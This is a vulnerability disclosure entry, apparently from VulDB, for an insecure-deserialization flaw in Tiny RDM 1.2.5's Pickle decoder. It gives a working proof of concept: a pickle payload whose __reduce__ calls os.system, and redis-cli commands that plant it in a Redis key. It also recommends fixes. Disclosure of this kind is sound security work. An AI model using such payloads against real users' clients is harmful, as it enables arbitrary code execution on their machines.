| 제목 | tiny-rdm Tiny RDM 1.2.5 Insecure Deserialization |
|---|
| 설명 | # TinyRDM Pickle Decoder RCE
- **Tiny RDM Version**: v1.2.5
- **OS Version**: Mac/Windows/Linux
- **Redis Version**: latest
TinyRDM ships with a builtin “Pickle” decoder that invokes `pickle.loads` on the TinyRDM host whenever a user explicitly selects Pickle decoding in the value viewer. Because Python pickle is inherently unsafe for untrusted input, an attacker controlling Redis data can achieve arbitrary code execution on the user’s machine simply by getting the user to inspect the malicious key and choose Pickle decoding in TinyRDM.
- **Affected components**
pickle_convert.go creates `pickle_decoder.py` and runs `pickle.loads(decoded)` without isolation. browser_service.go calls `convutil.ConvertTo` for key values when the user requests Pickle decoding.
- **Impact**
Remote code execution with the privileges of the TinyRDM desktop user. Any Redis server that a user connects to can deliver a pickle payload; viewing the key triggers arbitrary command execution on the client machine.
- **Proof of Concept**
1. Generate malicious pickle payload (touches `/tmp/hacked-by-zznq` on the TinyRDM host):
```python3
# poc.py
import pickle
import os
class RCE:
def __reduce__(self):
return (os.system, ("touch /tmp/hacked-by-zznq",))
with open("payload.pkl", "wb") as f:
f.write(pickle.dumps(RCE()))
```
```bash
python3 poc.py # writes payload.pkl
```
2. Start Redis (example):
```bash
docker run --rm -p 6379:6379 --name tinyrdm-redis redis:latest
docker cp payload.pkl tinyrdm-redis:/tmp/payload.pkl
docker exec tinyrdm-redis sh -c 'redis-cli -x LPUSH evil_poc:list </tmp/payload.pkl'
```
3. In TinyRDM, connect to the Redis instance and open key `evil_poc`. Choose decode values with "Pickle".
4. As soon as the value viewer loads, [PickleConvert::Decode](https://github.com/tiny-craft/tiny-rdm/blob/main/backend/utils/convert/pickle_convert.go#L107) executes on the host and creates `/tmp/hacked-by-zznq`, proving code execution.
<img height="800" alt="Image" src="https://github.com/user-attachments/assets/f44b46e0-d414-438b-baad-1d3032e89682" />
- **Technical Details**
- When the user selects `decode=Pickle`, `convutil.ConvertTo` goes straight to `pickleConv.Decode`, spawning a local Python interpreter and running `pickle.loads`.
- List/Hash/Set/.. viewers call `ConvertTo` when the user changes the Decode dropdown, so payloads embedded in non-string key types can also trigger execution.
- **Recommended Fixes**
1. Require explicit opt-in with a prominent warning, or disable it entirely.
2. If pickle support must remain, run the helper in a sandbox (container, seccomp) and deserialize with a restricted, schema-checked parser rather than `pickle.loads`.
|
|---|
| 원천 | ⚠️ https://github.com/tiny-craft/tiny-rdm/issues/512 |
|---|
| 사용자 | zznQ (UID 64000) |
|---|
| 제출 | 2025. 12. 01. PM 04:16 (6 개월 ago) |
|---|
| 모더레이션 | 2025. 12. 12. PM 08:47 (11 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 336282 [tiny-rdm Tiny RDM 까지 1.2.5 Pickle Decoding pickle_convert.go pickle.loads 권한 상승] |
|---|
| 포인트들 | 20 |
|---|